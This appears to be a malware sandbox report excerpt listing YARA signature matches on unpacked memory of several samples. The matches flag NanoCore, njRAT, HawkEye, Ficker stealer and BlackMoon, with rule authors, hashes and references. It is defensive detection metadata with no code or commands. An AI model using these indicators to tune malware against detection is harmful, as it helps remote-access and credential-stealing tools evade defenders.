                    Source: 5.2.Pluto Panel.exe.7700000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 11.0.22.exe.5f65b6.23.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.22.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.10.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.2ea1844.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.0.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.5f65b6.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.43de6f.19.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 11.0.22.exe.530edf.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.95312e.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.43de6f.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 17.2.mediaget.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 11.0.22.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 0.2.RIP_YOUR_PC_LOL.exe.c8867b.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 15.0.0fd7de5367376231a788872005d7ed4f.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Ficker author = ditekSHen, description = Detects Ficker infostealer, clamav_sig = MALWARE.Win.Trojan.Ficker
                    Source: 11.0.22.exe.43de6f.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 8.0.gay.exe.d0000.0.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
                    Source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
                    Source: 11.0.22.exe.530edf.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
                    Source: 4.2.healastounding.exe.34865dc.7.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                    Source: 9.2.Opus.exe.5870000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
